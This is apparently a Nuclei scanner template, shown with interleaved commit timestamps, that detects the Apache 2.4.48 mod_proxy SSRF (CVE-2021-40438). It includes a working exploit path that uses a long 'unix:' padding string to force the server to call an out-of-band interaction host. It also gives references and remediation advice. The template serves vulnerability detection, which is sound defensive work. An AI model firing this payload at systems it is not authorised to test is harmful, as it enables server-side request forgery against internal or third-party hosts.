2021-10-14 19:59:52 +00:00
id : CVE-2021-40438
info :
2022-11-29 05:49:16 +00:00
name : Apache <= 2.4.48 - Mod_Proxy SSRF
2021-10-14 19:59:52 +00:00
author : pdteam
severity : critical
2022-04-25 14:35:07 +00:00
description : Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.
2021-10-14 19:59:52 +00:00
reference :
- https://firzen.de/building-a-poc-for-cve-2021-40438
- https://httpd.apache.org/security/vulnerabilities_24.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-40438
2023-04-12 10:55:48 +00:00
- https://cert-portal.siemens.com/productcert/pdf/ssa-685781.pdf
2022-05-17 09:18:12 +00:00
remediation : Upgrade to Apache version 2.4.49 or later.
2021-10-14 20:34:25 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
2022-05-17 09:18:12 +00:00
cvss-score : 9
2021-10-14 20:34:25 +00:00
cve-id : CVE-2021-40438
cwe-id : CWE-918
2023-04-12 10:55:48 +00:00
epss-score : 0.97517
2022-07-21 17:18:22 +00:00
tags : cve,cve2021,ssrf,apache,mod-proxy,kev
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-10-14 19:59:52 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-10-14 19:59:52 +00:00
- method : GET
path :
2023-03-09 13:39:16 +00:00
- '{{BaseURL}}/?unix:{{repeat("A", 7701)}}|http://{{interactsh-url}}'
2021-10-14 19:59:52 +00:00
2022-10-07 21:27:25 +00:00
host-redirects : true
2021-10-14 19:59:52 +00:00
max-redirects : 2
2023-03-09 13:19:32 +00:00
matchers-condition : and
2021-10-14 19:59:52 +00:00
matchers :
- type : word
words :
2022-02-23 08:00:19 +00:00
- "Interactsh Server"
2023-03-09 13:19:32 +00:00
- type : word
part : interactsh_protocol # Confirms the HTTP Interaction
words :
- "http"
2022-04-25 14:35:07 +00:00
# Enhanced by mp on 2022/04/22